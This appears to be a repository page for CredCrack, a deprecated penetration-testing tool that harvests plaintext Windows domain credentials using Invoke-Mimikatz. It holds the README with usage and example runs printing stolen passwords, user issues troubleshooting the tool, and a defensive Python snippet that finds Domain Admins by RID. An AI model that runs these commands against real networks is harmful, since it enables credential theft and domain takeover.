credcrack's Introduction

CredCrack

⛔ [DEPRECATED]. This repo is no longer being maintained. Please consider using CrackMapExec.

Introduction


CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recursively in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!

CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory. Download Invoke-Mimikatz Here

Help


usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples: 

./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

Examples


Enumerating Share Access

./credcrack.py -r 192.168.1.100 -d acme -u bob -es
Password:
 ---------------------------------------------------------------------
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100

 -----------------------------------------------------------------
 192.168.1.102 - Windows 7 Professional 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.102\ADMIN$ 
 OPEN      \\192.168.1.102\C$ 

 -----------------------------------------------------------------
 192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2 
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.103\ADMIN$ 
 OPEN      \\192.168.1.103\C$ 
 CLOSED    \\192.168.1.103\F$ 

 -----------------------------------------------------------------
 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 CLOSED    \\192.168.1.100\ADMIN$ 
 CLOSED    \\192.168.1.100\C$ 
 OPEN      \\192.168.1.100\NETLOGON 
 OPEN      \\192.168.1.100\SYSVOL 

[*] Done! Completed in 0.8s

Harvesting credentials


./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:

 ---------------------------------------------------------------------
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103

                  The loot has arrived...
                         __________
                        /\____;;___\    
                       | /         /    
                       `. ())oo() .      
                        |\(%()*^^()^\       
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       

                
[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!

     1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s

Contact

Contact me at @g0jhonny with any questions or features you'd like to see in the next update. For bugs submit an issue!

Credits

CredCrack couldn't have been possible without the contributions of the following individuals. You're all rockstars! @JosephBialek, @brav0hax, @altonjx and everyone else! Thank you for all your contributions and feedback to make this a better script, keep 'em coming!

credcrack's Issues

Unable to reach

Hi,
Thank you for your great work.

I've got this error when I use credcrack.py:

root@kali:~/Downloads/CredCrack-master# ./credcrack.py -d domaine -u user -f ip -l 10.247.192.217
Password:


CredCrack v1.0 by Jonathan Broche (@g0jhonny)


[*] Setting up the stage
[*] Validating 10.247.192.200
[*] Validating 10.247.192.192
[*] Validating 10.247.192.182
[*] Querying domain admin group from 10.247.192.200
[!] Unable to reach to 10.247.192.200
[*] Querying domain admin group from 10.247.192.192
[!] Unable to reach to 10.247.192.192
[*] Querying domain admin group from 10.247.192.182
[!] Unable to reach to 10.247.192.182

Do you have any idea how to resolve this, please?

Thank you!

no shell no error message

What could be the problem if I just got this:

root@kali:~/CredCrack# ./credcrack.py -d workgroup -r 192.168.122.237 -u Christian -l 192.168.122.25
Password:


CredCrack v1.0 by Jonathan Broche (@g0jhonny)


[*] Setting up the stage
[*] Validating 192.168.122.237
[*] Querying domain admin group from 192.168.122.237
[*] Cleaning up
root@kali:~/CredCrack#

The "list shares" works. Thank you

Online documentation is not updated

I'm reading the (online) documentation and it says only domain and user are required. From what I see, the local host and the remote host are also required.

Also, the documentation is kind of sketchy on exactly which parameters are needed and what they are for.

Standalone servers

Hi Jonathan,

First of all thanks for your great piece of software.
I tried credcrack on a standalone Windows 2008 R2 server that is not part of a domain and received the following error:

[!] User is not an admin on 10.0.1.51 or the system is not joined to a domain

The command I ran:
./credcrack.py -r 10.0.1.51 -d WORKGROUP -u administrator -l 10.0.1.20

So the question is why is it not possible to run credcrack on standalone servers?

ValueError: zero length field name in format

Hello, I have an error when I execute the script:

ValueError: zero length field name in format

My Python version is 2.6.6. I execute this command line:

./credcrack.py -d XXX -u XXX -f hosts -es

My exact error:

Traceback (most recent call last):
File "./credcrack.py", line 415,
main()
File "./credcrack.py", line 411, in main
print "{}[!]{} File: {} does not exist.".format(colors.red, colors.normal, args.file)
ValueError: zero length field name in format

Sorry for my bad English, and thank you very much.

[Errno 2] No such file or directory

./credcrack.py -d domain -u user -es -r 10.10.10.1


CredCrack v1.0 by Jonathan Broche (@g0jhonny)


[*] Validating 10.10.10.1
[!] Error listing shares on 10.10.10.1: [Errno 2] No such file or directory

I always get the same error, whatever options I use.
Is there a dependency I am missing?

I've tried with "-F hosts"
but I got the same message with all the IP addresses.
I've tried with a wrong password and it tells me the same...

Any idea?
Do I need to be under Kali?
I have CentOS 7
;)

No loot?

Hello,

I have been playing around with credcrack on a domain. I can validate the hosts with no issue. Yet when I go to harvest details, it always comes back with no loot. There are members in the "domain admins" group. There are two screenshots below showing the information.

http://puu.sh/lqnfQ/5a924e0d25.jpg (Validating Hosts)
http://puu.sh/lqngY/bdc4a46775.jpg (Harvesting)

Any ideas on why this is not working?

Thanks.

Output to file does not reflect the domain admins

When sending standard output to file in linux, highlights like yellow are not reflected in the output file.
Perhaps give a text clue to which credentials are domain admins, like (!) before the line. This way, when running this script and reviewing later from a file, the domain admins can still be identified.

Servers with different languages fail

Hi John,

Today I used credcrack on a Dutch Windows Server 2008 R2 installation and it fails because CredCrack can't query the Domain Admins group.

On a Dutch Windows Server 2008 R2 installation the group name is "Domeinadministrators". I guess this Domain admin group is different on all other Windows server installations that are using a language other than English.

It might be an idea to gather all those group names and make an option for it in CredCrack?

Some more info:

The error message I receive from $output:

[*] Setting up the stage
[*] Validating 192.168.178.23
[*] Querying domain admin group from 192.168.178.23

Kan de groepsnaam niet vinden.

Typ NET HELPMSG 2220 voor meer hulp.

[!] User is not an admin on 192.168.178.23 or the system is not joined to a domain

Translated:

Can't find the group name.
Type NET HELPMSG 2220 for more help.
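
The localization problem reported above also affects defensive tooling: any audit or detection keyed on the literal string "Domain Admins" misses "Domeinadministrators". The following is an added example, not CredCrack code and not from the issue author. It identifies the group by its well-known RID 512 instead of its display name and flags members that are not on an approved list. The record layout, SIDs, the name "Domeingebruikers" and the member names are constructed sample data.

```python
import re

DOMAIN_ADMINS_RID = 512  # well-known RID; the same on every Windows language edition
_DOMAIN_SID = re.compile(r"^S-1-5-21(-\d+){3}$")

def domain_admins_sid(domain_sid):
    """Build the Domain Admins SID from a domain SID (S-1-5-21-a-b-c)."""
    if not _DOMAIN_SID.match(domain_sid):
        raise ValueError("not a domain SID: %r" % (domain_sid,))
    return "%s-%d" % (domain_sid, DOMAIN_ADMINS_RID)

def find_by_name(groups, name="Domain Admins"):
    """Name-based lookup: breaks when the directory uses a localized name."""
    return next((g for g in groups if g["name"].lower() == name.lower()), None)

def find_by_sid(groups, domain_sid):
    """SID-based lookup: independent of the display language."""
    target = domain_admins_sid(domain_sid)
    return next((g for g in groups if g["sid"] == target), None)

def unexpected_admins(groups, domain_sid, approved):
    """Members of Domain Admins that are not on the approved list."""
    group = find_by_sid(groups, domain_sid)
    if group is None:
        raise LookupError("no group with RID 512 in export")
    allowed = {a.lower() for a in approved}
    return sorted(m for m in group["members"] if m.lower() not in allowed)

# Constructed sample exports (SIDs, names and members are made up).
EN_SID = "S-1-5-21-1000000001-1000000002-1000000003"
NL_SID = "S-1-5-21-2000000001-2000000002-2000000003"
EN_GROUPS = [
    {"name": "Domain Users", "sid": EN_SID + "-513", "members": ["jsmith", "daguy"]},
    {"name": "Domain Admins", "sid": EN_SID + "-512", "members": ["daguy"]},
]
NL_GROUPS = [
    {"name": "Domeingebruikers", "sid": NL_SID + "-513", "members": ["jan", "piet"]},
    {"name": "Domeinadministrators", "sid": NL_SID + "-512", "members": ["piet", "svc_backup"]},
]

if __name__ == "__main__":
    for label, groups, sid in (("EN", EN_GROUPS, EN_SID), ("NL", NL_GROUPS, NL_SID)):
        by_name = find_by_name(groups)
        print(label, "by name:", by_name["name"] if by_name else None,
              "| by SID:", find_by_sid(groups, sid)["name"],
              "| unexpected:", unexpected_admins(groups, sid, ["daguy", "piet"]))
```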
